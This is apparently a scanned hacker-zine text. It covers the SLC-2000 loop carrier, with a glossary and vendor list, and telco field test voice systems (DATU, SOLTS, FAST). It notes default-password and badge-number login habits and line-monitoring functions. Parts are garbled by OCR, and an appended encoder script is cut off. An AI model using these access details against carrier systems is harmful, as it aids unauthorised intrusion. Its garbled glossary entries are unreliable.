is green when -48v power is present. The Power Minor LED is yellow when
the system is operating on battery power. The Alarm Cut Off (ACO) LED is
green when the ACO button has been pressed during an alarm. The
Critical LED is red when a failure has caused a loss of service for 128
or more customers. The Major LED is red when a failure has caused a
loss of service for 24 or more customers. The Minor LED is yellow when
an error exists, but is not causing a loss of service to any customers.
The Near End (NE) Activity LED is yellow when the local terminal has
some alarm condition. The Far End (FE) Activity LED is yellow when the
remote terminal has some alarm condition. The Abnormal LED is yellow
when the SLC-2000 is not in a mode that provides service, such as a test
mode. The Session LED is yellow when a technician has a CIT connected to
the remote terminal.

The most interesting part of the UIP is the Alphanumeric Message Display
(AMD) and the buttons associated with its use. The AMD displays a
single 24 character line of text. The scroll buttons may be pushed to
move forward and backward through various menu choices. The <Enter> and
<Escape> keys work just as you might imagine.

Three types of messages appear on the User Interface Panel (UIP):

    Automatic Messages
    Fault Messages
    Alarm Messages


Automatic Messages are triggered by pressing certain buttons, 
UIP or PDC unavailability, and SYSCTL installation. 
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Fault Messages are displayed when the RETRIEVE-FAULTS command is 
selected on the UIP. 


Alarm Messages are displayed when the RETRIEVE-ALARMS command is 
selected on the UIP. 


The Automatic Messages are: 


PANEL FAULT 
MN:NE:pdc unavail 


UPDATE: In-Progress 

UPDATE: done 

SONET SUBSYS UPDATE done 

SYSCTL INITIALIZATION 

SYSC EXTENDED INITZN 

SYSCTL EXTND INITZN done 

STATUS -LOCAL SONET 

STATUS -LOCAL SONET SITE 

STATUS -REMOTE SITE 1 

STATUS -REMOTE SITE 2 

STATUS -REMOTE SITE 3 

STATUS -REMOTE SITE 4 

STATUS -REMOTE SITE 5 

STATUS -REMOTE SITE 6 

STATUS -REMOTE SITE 7 

STATUS -REMOTE SITE 8 
"PANEL FAULT" indicates that the User Interface Panel (UIP) has 
failed and is unable to communicate with the Provisioning 
Display Controller (PDC). 


"MN:NE:pdc unavail" indicates that the Provisioning Display 
Controller (PDC) is unable to communicate with the User 
Interface Panel (UIP) because it has failed, or because software 
installation on the PDC is in progress. 


"UPDATE: In-Progress" indicates that the UPDATE button has been 
pressed and that an update is in progress. (See "Update button" 
below.) 


"UPDATE: done" indicates that an Update has been completed in
response to the use of the UPDATE button.


"SONET SUBSYS UPDATE done" indicates that an Update has been 
completed in the SONET subsystem in response to the use of the 
UPD/INIT button on the SYSCTL. 


"SYSCTL INITIALIZATION" appears for 10 seconds after a SYSCTL 
with working software has been inserted. If the UPD/INIT button 
on the SYSCTL is pressed while this message is displayed, the 


SYSCTL will reset all SONET parameters to their factory 
defaults. 
"SYSCTL EXTENDED INITZN" appears after SYSCTL INITIALIZATION has
been completed.


"SYSCTL EXTND INITZN done" appears after SYSCTL EXTND INITZN has 
been completed. 


"STATUS -LOCAL SONET" indicates the User Interface Panel (UIP) 
indicators reflect the alarm status of the local system only. 
The letter "L" is displayed in the SYSCTL 7-segment display. 

This occurs when the user toggles the Far-End Select (FE SEL) 
button on the SYSCTL. 


"STATUS -LOCAL SONET SITE" indicates the User Interface Panel 
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(UIP) indicators reflect the combined alarm status of all the 
SONET network elements at the local site. The SITE ID anda ’.’ 
is displayed in the SYSCTL 7-segment display. This occurs when 
the user toggles the Far-End Select (FE SEL) button on the 
SYSCTL. 


"STATUS -REMOTE SITE x" indicates the User Interface Panel (UIP) 
indicators reflect the alarm status of REMOTE SITE x. The 
number "x" is displayed in the SYSCTL 7-segment display. This 
occurs when the user toggles the Far-End Select (FE SEL) button 
on the SYSCTL. 


There are several other miscellaneous buttons on the UIP. The LED Test 
button lights up all of the LED’s to allow quick identification of burnt 
out LED’s. The Alarm Cut Off (ACO) button shuts off the current alarm 
condition. The Update button operates much like the "Detect New 
Hardware" icon in Windows95, except that on the SLC-2000 it never locks 
up your system. 


Metallic Distribution Shelf (MDS) 


The MDS provides control and distribution for Digital Signal 0 (DS0) and
Fiber In The Loop (FITL) interfaces.


[Diagram: an MDS shelf assembly in a metallic configuration.]

An MDS shelf assembly is split into an upper and a lower shelf; the
shelves are numbered from bottom to top. On the left and right side of
each shelf half are 12 channel units. In the middle of each shelf half
are the common units.

[Diagram: an MDS shelf assembly in a Fiber In The Loop (FITL)
configuration.]
High Density Fiber Optics Shelf (HDOS)

The HDOS interfaces between the electrical signals on the MDSs and the
optical signals on the Multi-Services Distant Terminals (MSDTs).

An HDOS contains 8 Optical Unit (OU) / Power Conversion Unit (PCU)
packs, protected by 1 AMP fuses.


The ATU panel reports alarms and trouble indicators using audible 
alarms, visual indicators, and telemetry. In addition, the ATU provides 
interfaces to the Pair Gain Test Controller (PGTC) and DC bypass pair 
connections. 


The indicator lights on the far right end of the ATU are Fault, Busy
and Power Minor on the left, and Critical, Major and Minor on the right.
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Fan Units and Heat Baffles 


Fan units are used in RTs to provide cooling, while COTs use heat
baffles for the same purpose.

The far left end of the fan unit in an RT carries a FAULT LED, a CHANGE
FAN SPEED button (with a 10 minute test timeout), an LED TEST button, a
temperature scale marked in both degrees C (0 to 100) and degrees F (32
to 212), and an ESD ground jack.

Where might you find an RT?

RTs are found in quite an interesting variety of enclosures, including
metal and cast concrete. Some are only large enough to hold the RT,
while others are environmentally controlled and large enough to hold the
equipment and several working technicians.

    44A + 44B Cabinets
    WP-91071 Cabinet
    51A Cabinet
    80D Cabinet (Community Service Vault)
    80E Cabinet (Community Service Vault)
    Mini hut
    Maxi hut
    Concrete hut
    Controlled Environment Vault (CEV)


The 44A Cabinet is a wall mounted cabinet that requires a 44B Cabinet 
to house the powering equipment. 


WP-91071 Cabinet is a stand alone cabinet. 


The 51A cabinet is 48" high by 29" wide by 20.5" deep. The 51A cabinet
consists of three sections: the front door, the electronics section,
and the battery section. The front door is hinged on the left and
opens to reveal the electronics section. The electronics section is
also hinged on the left, and opens to reveal the battery section.


The 80D Cabinet (Community Service Vault). 


The 80E Cabinet (Community Service Vault). 


The Mini hut is a prefabricated 6' by 10' by 8' high enclosure.


The Maxi hut, also known as the Electronic Equipment Enclosure (EEE) is 
a prefabricated 10’ by 20’ by 8’ high environmentally controlled 
enclosure. 


The Concrete Hut is 13’ 2" by 7’ 7 and 8’ 8.5" high. The walls of the 
Concrete Hut are made of precast concrete and are 4" thick. The inside 
of the Concrete Hut is ventilated, heated and air conditioned. The 
Concrete Hut is protected by intrusion alarms, smoke alarms, and high 
temperature alarms. 


The Controlled Environment Vault (CEV) is a precast concrete enclosure
designed for installation below ground. The CEV is cast in three parts:
the bottom half, the top half, and the entrance hatch. The entrance to
a CEV shows a ladder leading down into the enclosure. The CEV is the
ultimate in environmental control. In addition to ventilation, heating
and optional air conditioning, the CEV also features a gas monitor that
senses explosive and toxic gasses, a dehumidifier, and a sump pump. The
CEV is lit by four fluorescent lamps backed up by an emergency lamp. The
CEV is protected by a gas alarm, a high temperature alarm, a
high-humidity alarm, a power-loss alarm, a high-water alarm and an
intrusion alarm.


Enclosure            Systems    Dual Channel Banks     Lines
44A+44B Cabinets         2              1                192
WP-91071 Cabinet         4              2                384
51A Cabinet              2              1                192
80D Cabinet              4              2                384
80E Cabinet              8              4                768
Concrete Hut        32 (36)        16 (18)        3072 (3456)
CEV (16')           40 (44)        20 (22)        3840 (4224)
CEV (24')           60 (78)        30 (39)        5760 (7488)
EEE                 72 (78)        36 (39)        6912 (7488)

Note: Numbers in parentheses are applicable only to systems using bulk
power. Each system serves 96 lines; a dual channel bank holds two
systems.


SLC Interface Software 
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SLC Glossary 


A&M Addition and Maintenance 

ACO Alarm Cut Off 

ACU Alarm Control Unit 

ACXT Apparatus Case Crosstalk 

ADPCM Adaptive Differential Pulse Code Modulation 
ADU Alarm Display Unit 

ALU Alarm Interface Unit 

ALBO Automatic Line Build Out 

ALC Automatic Loss Compensation 

ALIT Automatic Line Insulation Test 

AMD Alphanumeric Message Display 

ANI Automatic Number Identification 

ASN Abstract Syntax Notation 

ASU Alarm Suppressor Unit 

ATU Alarm and Test Unit 

AWC Average Worst Case 

B-E Both-Ends 

B8ZS Bipolar with 8 Zero Substitution 

BCU Bank Controller Unit 

BFU Bank Fuse Unit 

BIU Backplane Interface Unit, Bank Interface Unit 
BMP Bandwidth Management Processor 

CAU Craft Access Unit, Channel Access Unit 


CECLTT International Telephone and Telegraph Consultative Committee 
CCS Hundred Call Seconds 


CDO Community Dial Office 

CDS Circuit Design System 

CENTREX Central Office Exchange Service 

CEV Controlled Environment Vault 

CFU Channel Fuse Unit 

CIMAP Circuit Installation and Maintenance Package 
CIR Customer Information Release 

CIT Craft Interface Terminal 

C1IU Craft Interface Unit 

CLC Common Language Coordinator 

CLE Common Language Equipment Identification 
CLF Carrier Line Failure 

CLLI Common Language Location Identification 
CLRC Circuit Layout Record Card 

CMC Construction Management Center 

CMIS Common Management Information System 

CND Calling Number Delivery 

CO Central Office 

COACH Customized On-line Aid for Customer Help 
CODEC Coder/Decoder 

COE Central Office Engineer 

COT Central Office Terminal 

CP Circuit Pack 

CPC Circuit Provisioning Center 

CPL Circuit Party Identification 

CRC Cyclic Redundancy Check, Circuit Redundancy Code 
CSA Carrier Serving Area 

CSC Community Service Cabinet 

CSDC Circuit Switched Digital Capability 
CSPEC Common Systems Planning and Engineering Center 
CSS Controlled Slip Second 

CTB Cut Through Board 

CTU Channel Test Unit 

CU Channel Unit 

CUE Channel Unit Emulator 


CV Coding Violation 
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CWG Construction Work Group 

CZ Carrier Zone 

DA Distribution Area 

DACS Digital Access Cross-connect System 
DCC Data Communications Channel 

DCLU Digital Carrier Line Unit 

DCU Digital Connectivity Units 

DDF Digital Digroup Formatter 

DDS Digital Data Service 

DF Distributing Frame 

DEI Digital Facilities Interface 

DID Direct Inward Dial 

DILEP Digital Line Engineering Program 
DLC Digital Loop Carrier 

DLI Data Link Interface 

DLP Detailed Level Procedure 

DLR Design Layout Record 

DLS Digital Line Schematic 

DLU Data Link Unit 

DM Degraded Minute 

DPO Dial Pulse Originating 

DPT Dial Pulse Terminating 

DPX DATAPATH Extension 

DR Demand Repeater 

DSO Digital Signal 0, Data Service 0 
DSODP Digital Signal 0 Dataport 

DS1 Digital Signal 1 (1.544 MB/s) 

DSDC Distribution Services Design Center 
DSL Digital Subscriber Line 

DSNE Directory Services Network Element 
DSPC Distribution Services Planning Center 
DST Digital Signal Translator 

DSU Data Service Unit 

DSX Digital Service Cross-connect 

DT Distant Terminal 

DTU Digital Test Unit 

E Bar 

EASOP Economic Alternative Selection for Outside Plant 
ECCR Exchange Customer Cable Record 

EEC Electronic Equipment Enclosure 

EE Equipment Engineering Center 

EFPA Enhanced Feature Package A 

EFPB Enhanced Feature Package B 

EFPC Enhanced Feature Package C 

EFPD Enhanced Feature Package D 

EF RAP Exchange Feeder Route Analysis Program 
EJO Engineering Job Order 

ELIU Electrical Line Interface Unit 

EMO Expected Measured Loss 

EOC Embedded Operations Channel 

ES Errored Seconds 

ESD ElectroStatic Discharge 

ESF Extended Super Frame 

ESPORTS Extended Super POTS 

EWC Extreme Worst Case 

EWO Engineering Work Order 

FA Feeder Administration 

FAC Facility Assignment and Control Center 
FACS Facility Assignment and Control System 
FAP Facility Analysis Plan 

FCS Frame Checking Sequence 

FCU Fan Control Unit 

FDI Feeder Distribution Interface 

FDL Facility Data Link 

FE Far End 

FELP Far End LooP 

FEMF Foreign Potential 

FEXT Far End Crosstalk 
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FITL Fiber In The Loop 

FL Fault Locating 

FLTA Fault Locate Test Adapter 

FPA Feature Package A 

FPB Feature Package B 

FPC Feature Package C 

FPD Feature Package D 

FPS Framing Pattern Sequence 

FSM Fiber Service Module 

FSR Frequency Selective Ringing 

FSS Fiber Service Shelf 

FTTH Fiber To The Home 

FX Foreign Exchange 

FXO Foreign Exchange Office 

FXS Foreign Exchange Station 

GNE Gateway Network Element 

GS Ground Start 

HDIC High Density Interconnect 

HDOS High Density Optics Shelf 

HDT Host Digital Terminal 

HTR Heater 

IBN Integrated Business Network 
IDCU Integrated Digital Carrier Unit 
IDF Intermediate Distributing Frame 
INA Integrated Network Access 

IOP Input/Output Processor 

ISD Tsolation Diagram 

ISDN Integrated Services Digital Network 
ISLU Integrated Services Line Unit 
ITH Integral Test Head 

LAC Loop Assignment Center 

LAN Link to Alarm and Networks 

LBO Line Build Out 

LBRV Low Bit Rate Voice 

LCRIS Loop Cable Record Inventory System 
LDS xocal Digital Switch 

LDU Load Distribution Unit 

EC oop Electronic Coordinator 

.ED ight Emitting Diode 

LFACS Loop Facility Assignment and Control System 
LFC Line Feeder Converter 

LFU Line Fuse Unit 

LIC Lightguide Interconnect Cable 
LIT Line Insulation Test 

LIU Line Interface Unit 

LM Loop Multiplexer 

LMOS Loop Maintenance Operating System 
LOF Loss Of Frame 

LOS Loss Of Second 

LP Low Power 

LRAP Long Route Analysis Program 

LRD Long Route Design 

LROPP Long Range Outside Plant Plan 
LRT Local Remote Terminal 

LS Loop Start 

LSI Line Side In 

LSO Line Side Out 

LSS Loop Switching System 

LSU sine Switching Unit 

LT Line Terminal 

LTC .xocal Test Cabinet 

LTD xocal Test Desk 

M Mouth 

MC Maintenance Center 

MCC Master Control Center 

MD Manufacture Discontinued 

MDF Main Distributing Frame 


Metallic Distribution Shelf 
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Man Hole 
Metallic Interface Unit, Maintenance Interfac 
Major 


Mechanized Loop Testing 
Material Management 
Minor 

Miscellaneous Pair Panel 
Meter Reading 
Multi-Services Distant Terminal 
Message Telephone Servic 

Majority Vote Error Correction 
Maintenance Work Center 

Maintenance Work Group 

Message Waiting Indication 
Multiplexer Unit 

Network Alarm Bus 

Network Access Interface Unit 

Network Channel Terminating Equipment 
Near End 
Near End Crosstalk 

Network Interface Data Bus 
Network Interface Unit 

New Manhole 

Network Monitoring and Analysis 
Numbering Plan Area 

Network Termination 

Network Terminal Equipment Center 
Non Trouble-Clearing Procedure 
Office Channel Unit 

Office Channel Unit Dataport 
Overhead Controller 

On-hook Transmission 

Optical Interconnect 

Office Interface Unit 

Optical Line Interface Unit 
Operator Number Identification 
Optical Network Unit 

Out Of Service 

Outside Plant Engineer 

Off Premise Station 


E Operations System/Intelligent Network Element 


Office Repeater Bay 

Outside Plant 

Outside Plant Engineer 

Office Timing Unit 

Optical Units 

Order Wire 

Pulse Amplitude Modulation 
Power Amplifier Unit 

Private Branch Exchange 

Pulse Code Modulation 

Power Converter Unit 
Provisioning Display Controller 
Pair Gain 
Pair Group Display 

Pair Group Planning 

Pair Gain System 

Pair Gain Test Controller 
Polyethylene Insulated Conductor 
Plug-in Inventory Control System 
Power Minor 

Present Mode of Operation 

Plain Old Telephone Servic 
Positive Ringing Unit 

Port Test Alarm Bus 

Power Unit 

Printed Wiring Board 

Remove and Reinstall 


Unit 


Wed Apr 26 09:4 


3:42 2017 


RCU Ring Control Unit
RCVG Receiving
RDES Remote Data Entry System
REN Ringer Equivalency Number
RLS Repeater Location Schematic
RMU Remote Measurement Unit, Remote Maintenance Unit
ROS Remote Operations Service
RPFT Remote Power Feed Terminal
RSB Repair Service Bureau
RSM Remote Switching Module
RT Remote Terminal
RTS Remote Test System
RTU Remote Test Unit
RZ Resistance Zone
S&E Service and Equipment
S-E Signal-End
S/I Signal to Interference
S/N Signal to Noise
S1DN Stage One Distributing Network
S1DP Stage One Distributing Panel
SAI Serving Area Interface
SARTS Switched Access Remote Testing System
SB Signal Battery
SCC Switching Control Center
SCCS Switching Control Center System
SCEC Secondary Channel Error Correction
SDDF Subscriber Digital Distributing Frame
SDFI Subscriber Digital Facility Interface
SDH Synchronous Digital Hierarchy
SDX Subscriber Digital Crossconnect
SEFS Severely Errored Framing Second
SES Severely Errored Seconds
SF Super Frame
SFIU Switching Facility Interface Unit
SG Signal Ground
SID System IDentification
SLC Subscriber Loop Carrier
SLIM Subscriber Line Interface Module
SM Switching Module
SMAS Switched Maintenance Access System
SMU System Memory Unit
SO Service Order
SONET Synchronous Optical Network
SP Standard Power, Special Protection
SPGM Suburban Pair Gain Planning
SPGPM Suburban Pair Gain Planning Method
SPOTS Special Plain Old Telephone Service
SPR Superimposed Ringing
SPTS Signaling Path Test Set
SSC Special Service Center
SSP Special Service Protection
SSU Special Service Unit
STIU Switching Transmission Interface Unit
STM Span Terminating Module
STS Synchronous Transport Signal
SXS Step-by-Step
SYSCTL System Controller
T-BRITE T-Basic Rate Interface Transmission Extension
TAD Trouble Analysis Data
TAP Trouble Analysis Procedure
TASC Telecommunications Alarm Surveillance Control System
TASX Telecommunications Alarm Surveillance and Control System
TAU Time Assignment Unit
TBCU Test Bus Control Unit
TBOS Telemetry Byte-Oriented Serial
TCU TransCoder Unit
TD Toll Diversion
TDM Tandem
TFD Trunk Distributing Frame
TFIU Transmission Facility Interface Unit
TGS Synchronous Timing Generator
THC Test Head Controller
TIRKS Trunk Inventory and Record Keeping System
TLWS Trunk Line Work Station
TMC Time slot Management Channel
TMT Transmission Maintenance Terminal
TNO The New Order
TNOP Total Network Operating Plan
TO Transmission Only
TOC Task Oriented Costing
TOP Task Oriented Procedure
TPI Tip Party Identification
TRMTG Transmitting
TRU Transmit/Receive Unit
TSI Time Slot Interchange
TSU Transmission Signaling Unit
UAS UnAvailable Second
UIP User Interface Panel
UL Underwriters Laboratory
UNICCAP Universal Cable Circuit Analysis Program
USDL U-interface Digital Subscriber Line
VF Voice Frequency
VRT Virtual Remote Terminal
VT Virtual Tributary
VTU Virtual Tributary Unit
WATS Wide Area Telephone Service
WC Wire Center
WCPC Wire Center Planning Center
WES Warranty Eligibility System
WORD Work Order Record Details
XADU eXtended Alarm Display Unit
XTC eXtended Test Controller
ZCS Zero Code Suppression
SLC Vendors 
AT&T
12450 Fair Lakes Cir
Ste 302
Fairfax, VA 22033
Phone: (703) 802-3853
Fax: (703) 802-3853

                                          SLC-5     SLC-2000
Maximum No. Subscriber Ports              192       768
Remote Terminal (qty. per 7-ft. size)     3         1
Remote Inventory and Diagnostics          Y         Y
Identical Plug-ins for RT and COT         Y         Y
Max. DS1 Span Lines Supported             24        28
Max. DS1 Span Lines Powered/Protected     24        28
Integrated DS-3 Interface                 N         N
Integrated Sonet Interface                          OC-3
TR-008 Compatible Mode                    Y         Y
TR-303 Compatible Mode                    Y         Y


Fujitsu Network Communications Inc
O01 Telecom Parkway
Richardson, TX 75082
Phone: (800) 777-3278
Fax: (214) 479-6990

Product compared: FDLC
(feature table for the FDLC is not legible in the scan; it has the same
rows as the AT&T table above)


NEC America Inc
14040 Park Center Rd
Herndon, VA 22071
Phone: (703) 834-4000
Fax: (703) 834-4306

Product compared: ISC-303
(feature table for the ISC-303 is not legible in the scan; it has the same
rows as the AT&T table above)


Northern Telecom, Inc.
Northern Telecom Limited
8220 Dixie Road
Suite 100
Brampton, Ontario
L6T 5P6 Canada
Phone: (905) 863-0000
Phone: (800) 4-NORTEL

Products compared: DMS-1 Urban, Access Node
(feature table for these products is not legible in the scan; it has the
same rows as the AT&T table above)
RELTEC Corp
5875 Landerbrook Dr
Cleveland, OH 44124
Phone: (216) 460-3600
Fax: (216) 460-3690

Products compared: DISCS 1, Sonet DISCS, DISCS FITL
(feature table for these products is not legible in the scan; it has the
same rows as the AT&T table above)


Seiscor Technologies, Inc. (A division of Raytheon)
Box 470580
Tulsa, OK 74147-0580
Phone: (918) 252-1578
Fax: (918) 252-2757
E-Mail: seiscor@raytheon.com

Products compared: FiberTrag, S-24DU, RLC-1920
(feature table for these products is not legible in the scan; it has the
same rows as the AT&T table above)


----[ EOF 
[ Voice Response Systems

+ Part I +


Overview 


A VRS (Voice Response System) is a computer system that is called using 
a normal DTMF (Dual-Tone Multi-Frequency) telephone and interacted with 
by speaking or by pressing buttons on the telephone keypad. 


This article will discuss three such systems which are used by Local
Loop Carriers (LLCs) to maintain the Public Switched Telephone Network
(PSTN). The systems are:


DATU 
SOLTS 
FAST 


+ Part II + 


+ DATU LC/RT Loop Conditioning System + 


I.   Introduction
II.  Features
III. Usage
IV.  Part Numbers
Introduction 


The Harris Corporation’s DATU Loop Conditioning System combines a full
range of advanced features with unmatched versatility to help maximize
field testing and conditioning capabilities. The DATU system extends the
field technician’s ability to test subscriber lines through the
non-metallic environment of a pair gain system.


DATU is a printed wiring card that employs micro-processor control of 
test functions and provides voice prompting. The card is installed in 
the Metallic Facility Terminal (MFT) frame and connected through a 
No-Test trunk to a switching facility. It may be used with most types of 
Central Offices (CO) including SXS, Crossbar, ESS and DMS. 


The DATU system can include the Pair Gain Applique (PGA) II, located 
with the DATU system at the CO, and the Metallic Access Unit (MAU), 
which is mounted within a remote terminal. 


PGA units allow testing of subscriber lines being served through an 
SLC-96 pair gain system. The PGA provides an interface between the DATU 
and a Pair Gain Control Unit. The DATU will transmit tones to assist in 
determining the status of the carrier channel. When a subscriber line is 
being served by a pair-gain-system and the DATU is used to test it, a 
warble tone is heard. The warble tone is followed by either a single 
one-second tone, two one-second tones, or three one-second tones. This 
indicates either a single party channel, multi party channel or a coin 
channel. The absence of a tone indicates trouble with the channel or 
channel equipment. 


Features 


AUDIO MONITOR - The subscriber line may be monitored for up to 10
minutes, after which time the DATU disconnects from the No-Test trunk.
Audio Monitor may be used on either busy or idle lines. Traffic on a
busy line will be audible but unintelligible. The Audio Monitor Mode may
be exited before the end of the 10 minute period by selecting an
appropriate test function.


OPEN LINE - Opens subscriber line by removing battery and ground. 




SHORT LINE - A metallic short is placed across the tip and ring of the 
subscriber line. 


SHORT TO GROUND - A metallic connection between tip, ring, and ground. 
This feature is not available on a busy line. 


TIP TO GROUND - A metallic connection between tip and ground with the
ring open.


RING TO GROUND - A metallic connection between ring and ground with the 
tip open. 


HIGH LEVEL TEST TONE - A high level 577Hz metallic-tracing tone, 
interrupted four times per second, for identity purposes. The High Level 
Test Tone is not available on a busy line. 


HIGH LEVEL TONE ON TIP - Test tone is placed only on the tip side of the 
line, with the ring side grounded. 


HIGH LEVEL TONE ON RING - Test tone is placed only on the ring side of 
the line, with the tip side grounded. 


LOW LEVEL TEST TONE - A low level 577Hz simplex-tracing tone, 
interrupted four times per second, for identity purposes. The Low Level 
Test Tone may be applied even if the line under test is busy, and it 
will not disturb traffic on that line. Note that on some No.5 ESS 
switches, Simplex tone may not transmit. 


SINGLE LINE ACCESS - Allows conditioning functions on the same line used 
to access the DATU system. 
HOLD - Used to continue a line preparation function after disconnecting
from the system’s access line.


FORCED DISCONNECT - Allows the technician to disconnect from the system
at any time by dialing ##.


ADMINISTRATIVE - Password protection for both user and administrator
modes of access. System usage counters and timers are accessible through
interactive voice response.
DATU Usage


  Dial DATU Number.
  Dial User Security Code.
  Dial 7 Digit Subscriber Number.

  Normal Subscriber Line:  OK

  SLC Subscriber Line:     8 second warble
                           -then-
                           60 IPM busy:    Pair Gain Test Controller
                           -or-
                           120 IPM busy:   Busy test pair
                           -or-
                           1 second tone:  One party line
                           -or-
                           2 second tone:  Two party line
                           -or-
                           3 second tone:  Pay phone
                           -or-
                           No tone:        Bad carrier channel

  Enter DATU function code for condition:

    Audio Monitor (minutes, 0=10 minutes)
    Short Tip and Ring to Ground
    High Level Tone
    Low Level Simplex Tone
    Short Tip to Ring
    Continue test after disconnect
    Enter new seven digit subscriber number


Harris DATU Part Numbers


  DATU Loop Conditioning System            P/N 24820-0011
  DATU-RT Loop Conditioning System         P/N 24810-002
                                           P/N 24820-003
                                           P/N 24800-103
  DATU-RT (GID-5 Version)                  P/N 24820-005
  TDC                                      P/N 24800-102
  Metallic Access Unit                     P/N 24840-002
  MFT Card File                            P/N 25460-002
  Metallic Access Unit (RSU version)       P/N 24845-005
+ PART III + 


+ Small Office Loop Testing System + 


+ (SOLTS) + 


Small Office Loop Testing System (SOLTS) is a system used by telephone 
company field repair personnel to test a phone line from any touch-tone 
telephone. 

When dialing a SOLTS number, the first prompt is:


     "Please enter ID, terminate with #"


SOLTS allows 30 seconds to enter a correct ID, then prompts:


     "Please enter line number and press #"


SOLTS allows 60 seconds to enter a line number, then prompts:


     "Select mode, for help enter 0"


SOLTS allows 60 seconds to choose one of six options: 


Enter: 

1) Interactive Testing 
2) Calling on test line 
3) Retrieve results 

8) Hang up 

9) Enter line number 

0) Help 


Option one allows testing the telephone line connected to the number 
entered in step two above. Option two tests the line the technician is 
calling from. Option three is used to retrieve the results generated 
using options one and two. Option eight disconnects from the system. 
Option nine allows a new line number to be entered for testing. Option 
zero accesses on-line help. 


#) Line test 

1) Fault Location 
2) Special tests 
3) Completion Test 
8) Hang up 

9) Enter line number 
0) Help 
Line Test


Perform a line test on the number entered, then: 


7) Repeat Results 

8) Hang up 

9) Enter line number 
0) Help 


Fault Location 


Performs initial line test on the number entered, then: 


2) Next step 

7) Repeat results 

8) Hang up 

9) Enter line number 
0) Help 


Special Tests 


Performs initial line test on the number entered, then: 


Repeat line test
Loop and Ground
Pull dial tone
Pair ID Tone
Repeat results
Hang up
Enter line number
Help


Completion 


Performs a line test on the number entered, records the results, 
then requests: 


Repeat results 
Hang up 

Enter line number 
Help 


Mode 2 -- Calling On Test Line 


#) Line Test

3) Completion Test
8) Hang up
9) Enter line number
0) Help


Performs a line test on the number entered, if line is busy 
requests Craft to hang up, performs a line test and stores the 
results. 


8) Hang up 
9) Enter line number 
0) Help


Completion 


Performs a line test on the number entered, if line is busy
requests Craft to hang up, performs a line test, and records the
results.


8) Hang up
9) Enter line number
0) Help
Mode 3 Retrieve Results 


States the stored results for the line number entered, then: 


7) Repeat results 

8) Hang up 

9) Enter line number 
0) Help 


+ PART IV +


+ Field Access Service Tool + 


+ (F.A.S.T.) + 


When calling FAST, the first prompt is a request for a security code.
The security code is usually the employee badge number. After the
security code is entered and the # key is pressed, FAST will prompt for
the password. The password is usually 4-7 digits long and usually
expires every 30 days. The default password is usually the security
code. After the password is entered and the # key is pressed the FAST
New Notices and Features are played.


After all of that, the FAST Main Menu is made available:


FAST Main Menu

  Facilities Inquiry
  MLT Test
  Cut to new facilities
  Change Status of a cable and pair
  Test Caller-ID
  Close a Service Order
  Cable transfer (for splicers)
  Administrative
  News and documentation
  Connect call to Help Line


1: LFACS Inquiry
   1. by phone number
   2. by cable pair

   Enter telephone number
      1. Correct
      2. Re-enter
   1. Current assignment
   2. Spare pairs
   3. Multiple appearances
      1. F1 (feeder)
      2. F2 (distribution)
      3. F3 (if any)
      4. All facilities in loop

   2: Enter wire center NXX
      1. Correct
      2. Re-enter
   Enter cable number
      1. Correct
      2. Re-enter
   Enter pair count
      1. Correct
      2. Re-enter
   1. Current status
   2. Spare pairs
   3. Multiple appearances
   4. Defective pair list
   5. Another cable-pair
   6. Another pair, same cable

2: MLT test
   1. Quick
   2. Loop
   3. Full
   4. Add tone
   5. Remove tone
   Tone: Enter telephone number


1. Correct 
2. Re-enter 


Add tone - enter number of minutes of tone # 
1. Another request 


2. End call 
3. Wait for tone 


3: Cut to new facilities
   1. Service Order
   2. Trouble Ticket


   1: Service Order
      1. C-Order
      2. N-Order
      3. T-Order
      4. Other

      Enter 6 digit numeric portion of order number
      1. Correct
      2. Re-enter

      Go to "Hear F1 assignment" below.


   2: Trouble Ticket
      Enter telephone number
      1. Correct
      2. Re-enter


   Hear F1 assignment
      1. Cut
      2. Keep

   Hear F2 assignment
      1. Cut
      2. Keep

   Hear F3 assignment
      1. Cut
      2. Keep


   Go to "Specify code for bad pair" below.


4: Change status of a cable/pair to defective or non-defective


   Specify code for bad pair
      GTP
      OPN
      OTP
      UBL
      SHT
      GRG
      CBY
      Other


   1. Non-defective
   2. Defective, unknown
   3. Exposed
   4. Split pair
   5. Previous list

   Specify pair to use

      Enter new cable number or only # if no change
      1. Correct
      2. Re-enter

      Enter new pair number
      1. Correct
      2. Re-enter


FAST pages the technician to indicate the success 
of the cut. 


Note: If Fl is being cut both LFACS and COSMOS need 
updates. Two pager messages will be sent. 


If CF pair is used as spare, information will be 
given to break connection. 


5: Test Caller-ID 

Enter 7 digit telephone number to be called. 
1. Correct 

2. Re-enter 

3. Correct and calling from the number 


6: Close Service Order
   1. C-Order
   2. N-Order
   3. T-Order
   4. Other
   Enter 6 digit numeric portion of order number
   1. Correct
   2. Re-enter
   1. Closed today
   2. Closed yesterday
   3. Other


Cable transfer 

Enter TN from cut sheet 
1. Correct EWO.xfer 

2. Re-enter TN 


Enter first item number 
Enter last item number 
1. Correct 

2. Re-enter 


To transfer this item: 
1. Move to new equipment 
2. Skip this item 


Administrative 

1. Change Password 

2. Change 3 digit EC 
3. Change 3 digit NPA 


FAST News 


FAST Help Line 


When entering a variable number of digits, # is required to end entry.
When entering a fixed number of digits, # is not required.
Pressing 9 will always return to the main menu.


To enter alpha characters press * to enter alpha mode and then
use the following key sequences. Use * again to exit alpha mode.


For example: Voy866 would be *836393*866.

   A 21        T 81
   B 22        U 82
   C 23        V 83
   D 31        W 91
   E 32        X 92
   F 33        Y 93
   G 41        Z 03
   H 42          11
   I 43        " 12
   J 51        + 13
   K 52
   L 53
   M 61
   N 62
   O 63
   P 71
   Q 01
   R 73
   S  3
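An added example (not code from the article or from the FAST system itself) that encodes and decodes the alpha-mode key sequences described above: the letter table is the article's, the letter S is left out because its code is not legible in the scan, and the punctuation rows are omitted.

```python
"""Encoder/decoder for FAST alpha-mode key sequences (added example).

Letters are entered as two-digit codes between '*' toggles; digits outside
alpha mode are dialed as-is. The code table below is copied from the
article; S is omitted (illegible in the scan) and punctuation is left out.
"""

ALPHA_CODES = {
    "A": "21", "B": "22", "C": "23",
    "D": "31", "E": "32", "F": "33",
    "G": "41", "H": "42", "I": "43",
    "J": "51", "K": "52", "L": "53",
    "M": "61", "N": "62", "O": "63",
    "P": "71", "Q": "01", "R": "73",
    "T": "81", "U": "82", "V": "83",
    "W": "91", "X": "92", "Y": "93", "Z": "03",
}
CODE_TO_LETTER = {code: letter for letter, code in ALPHA_CODES.items()}
ALPHA_TOGGLE = "*"


def encode_fast(text: str) -> str:
    """Turn a mixed letter/digit string into the keys a technician dials.

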